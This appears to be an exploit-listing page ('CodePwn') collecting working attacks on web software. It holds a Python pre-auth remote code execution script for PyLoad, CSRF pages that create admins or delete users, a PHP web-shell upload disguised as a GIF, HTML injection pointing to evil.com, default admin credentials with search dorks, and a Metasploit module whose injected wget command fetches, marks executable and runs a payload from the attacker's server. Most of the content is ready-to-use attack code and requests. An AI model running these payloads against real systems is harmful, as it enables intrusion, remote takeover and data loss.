Latest exploits :: CodePwn

<pre><code># Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) # Date: 06-10-2023 # Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe) # Vendor Homepage: https://pyload.net/ # Software Link: https://github.com/pyload/pyload # Version: 0.5.0 # Tested on: Ubuntu 20.04.6 # CVE: CVE-2023-0297 import requests, argparse parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') arguments = parser.parse_args() def doRequest(url): try: res = requests.get(url) if res.status_code == 200: return True else: return False except requests.exceptions.RequestException as e: print("[!] Maybe the host is offline :", e) exit() def runExploit(url, cmd): endpoint = url + '/flash/addcrypted2' if " " in cmd: validCommand = cmd.replace(" ", "%20") else: validCommand = cmd payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) print('[+] The exploit has be executeded in target machine. ') def main(targetUrl, Command): print('[+] Check if target host is alive: ' + targetUrl) alive = doRequest(targetUrl) if alive == True: print("[+] Host up, let's exploit! ") runExploit(targetUrl,Command) else: print('[-] Host down! ') if(arguments.url != None and arguments.cmd != None): targetUrl = arguments.url Command = arguments.cmd main(targetUrl, Command) </code></pre>

<pre><code>==================================================================================================================================== | # Title : Rest-Cafe and Restaurant Website CMS 2.0.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.2(64-bit) | | # Vendor : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 | | # Dork : "news.php?slug=" | ==================================================================================================================================== poc : [+] leaves a default set of administrative credentials installed post installation. [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload :Login Super Admin Username: sadmin@gmail.com Password: 1234 Admin Username: admin@gmail.com Password: 1234 [+] https://127.0.0.1/nominomidelight.com/admin/visual_settings Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : QUICKAD CMS 7.3 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 | | # Dork : "Bylancer, All right reserved" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code create a new admin . [+] Go to the line 61. [+] Set the target site link Save changes and apply . [+] infected file : /admin/panel/admin_add.php . [+] http://127.0.0.1/q7.3/admin/panel/admin_add.php . [+] save code as poc.html . <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://www.w3.org/2005/10/profile">  <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" />  <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" />  <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" />  <link rel="stylesheet" id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" /> <link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" /> <link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" /> <link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" /> <link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" /> <link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" />  <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css"> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css"> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" />  <link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css"> <link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css"> <script> var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php'; </script> </head> <body class="app-ui layout-has-drawer layout-has-fixed-header"> <div class="app-layout-canvas"> <div class="app-layout-container"> <aside class="app-layout-drawer">  <div class="app-layout-drawer-scroll">  <div id="logo" class="drawer-header"> <main class="app-layout-content">  <div class="container-fluid p-y-md">  <div class="card"> <div class="card-header"> <h4>Admin users</h4> <div class="pull-right"> <a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a> </div> </div> <div class="card-block"> <div id="js-table-list"> <table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable"> <thead> <tr> <th class="text-center w-5 sortingNone"> <label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0"> <input type="checkbox" id="check-all" name="check-all"> </label> </th> <th> Admin user</th> <th class="w-10">Email</th> <th style="width: 60px;">Actions</th> </tr> </thead> <tbody id="ajax-services"> </tbody> </table> </div> </div>  </div>   </div>   </main> <script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <div class="site-action"> <button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button> <button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating"> </button> <div class="site-action-buttons"> <button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin" class="btn-raised btn btn-danger btn-floating animation-slide-bottom"> </button> </div> </div> <div class="col-md-12">  <div class="site-action"> <button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button> <button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating"> </button> <div class="site-action-buttons"> <button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin" class="btn-raised btn btn-danger btn-floating animation-slide-bottom"> </button> </div> </div> <div class="form-group"> <label for="exampleInputfullname">Full Name<code></code></label> <div class="input-group"> <div class="input-group-addon"></div> <input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required=""> </div> </div> </div> <h4 class="box-title">User Login Details</h4> <hr> <div class="col-md-12"> <div class="form-group"> <label for="exampleInputuname">Username<code>*</code></label> <div class="input-group"> <div class="input-group-addon"></div> <input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required=""> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="exampleInputEmail1">Email address<code></code></label> <div class="input-group"> <div class="input-group-addon"></div> <input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required=""> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="exampleInputpwd1">Password<code></code></label> <div class="input-group"> <div class="input-group-addon"></div> <input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required=""> </div> </div> </div> </div> <div class="row"> </div> </div> </form> </div> </div> </div>  </div> </div> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>

<pre><code># Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF) # Google Dork: n/a # Date: 09/06/2023 # Exploit Author: Ramil Mustafayev (kryptohaker) # Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php # Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip # Version: 1.0 # Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28 # CVE : n/a Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data. To exploit this vulnerability, an attacker needs to do the following: 1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/ 2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com 3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example: <html> <body> <form action="http://example.com/update.php" method="GET"> <input type="hidden" name="demail" value="victim@example.com" /> </form> <script> document.forms[0].submit(); </script> </body> </html> 4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html 5. Send the URL of the HTML page to the admin user via email, social media, or any other means. If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge. </code></pre>

<pre><code>Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation Date: 17-01-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://phpgurukul.com> Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3187 =============================== STEPS_TO_REPRODUCE =============================== 1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com” Password: Test@123” 2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image 3. Open the Burp-suite and Intercept the Edit Image Request 4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ” 5. Change the **Content-type from “ image/png “ to “ image/gif “ 6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>` 7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension** 8. Below is the Burpsuite-POST Request for all the changes that I have made above ========================================== BURPSUITE_REQUEST ========================================== POST /trms/teacher/changeimage.php HTTP/1.1 Host: localhost Content-Length: 442 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: <http://localhost> Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: <http://localhost/trms/teacher/changeimage.php> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc Connection: close ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="subjects" John Doe ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif" Content-Type: image/gif GIF89a <?php echo system($_REQUEST['dx']); ?> ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryndAPYa0GGOxSUHdF-- =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md </code></pre>

<pre><code>Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities Google Dork: NA Date: 09-06-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://www.sourcecodester.com/> Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3184 ============================== CREDENTIAL TO USE ============================== ADMIN-ACCOUNT USERNAME: admin PASSWORD: admin123 ============================= PAYLOAD_USED ============================= 1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> 2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> 3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> 4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> =============================== STEPS_TO_REPRODUCE =============================== 1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN 2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username` 4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON 5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED . 6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE ========================================== BURPSUITE_REQUEST ========================================== POST /php-sts/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 1037 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-sts/admin/?page=user/manage_user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn Connection: close ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="id" ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="firstname" <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="middlename" <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="lastname" <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="username" <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="password" 1234 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary7hwjNQW3mptDFOwo-- =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super( update_info( info, 'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in /controller/ping.php. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability. Later models require authentication which is not provided in this module because we can't test it. The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022). Run 'check' first to determine if vulnerable. The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT and LPORT while testing this module. }, 'Author' => [ 'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module 'Justin Fatuch Apt4hax', # Exploit PoC 'Robert Bronstein' # Metasploit Module ], 'References' => [ ['CVE', '2022-40022'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022'] ], 'DisclosureDate' => '2022-08-31', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Automatic', {} ], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] } ) ) register_options( [ OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']), OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']), OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444']) ], self.class ) end def primer; end def on_request_uri(cli, req) @pl = generate_payload_exe print_status("#{peer} - Payload request received: #{req.uri}") send_response(cli, @pl) end def check uri = '/controller/ping.php' res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'currentTab' => 'ping', 'refreshMode' => 'dirty', 'ethDirty' => 'false', 'snmpCfgDirty' => 'false', 'snmpTrapDirty' => 'false', 'pingDirty' => 'true', 'hostname' => "\`id\`", 'port' => 'eth0', 'pingType' => 'ping' } }) if res && res.body.to_s =~ /uid=0/ Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def request(cmd) uri = '/controller/ping.php' send_request_cgi({ 'method' => 'POST', 'Content-Type' => 'application/x-www-form-encoded', 'uri' => uri, 'vars_post' => { 'currentTab' => 'ping', 'refreshMode' => 'dirty', 'ethDirty' => 'false', 'snmpCfgDirty' => 'false', 'snmpTrapDirty' => 'false', 'pingDirty' => 'true', 'hostname' => cmd, 'port' => 'eth0', 'pingType' => 'ping' } }) end def exploit srvhost = datastore['SRVHOST'] srvport = datastore['SRVPORT'] filename = datastore['FILENAME'] resource_uri = '/' + filename shell_path = '/tmp/' cmds = [ "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`", "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`", "\`" + shell_path + filename + "\`" ] start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri } }) print_status("#{rhost}:#{rport} - Exploit started...") print_status("#{rhost}:#{rport} - Sending wget command...") request(cmds[0]) sleep(3) print_status("#{rhost}:#{rport} - Making payload executable...") request(cmds[1]) sleep(3) print_status("#{rhost}:#{rport} - Executing payload...") request(cmds[2]) sleep(3) end end </code></pre>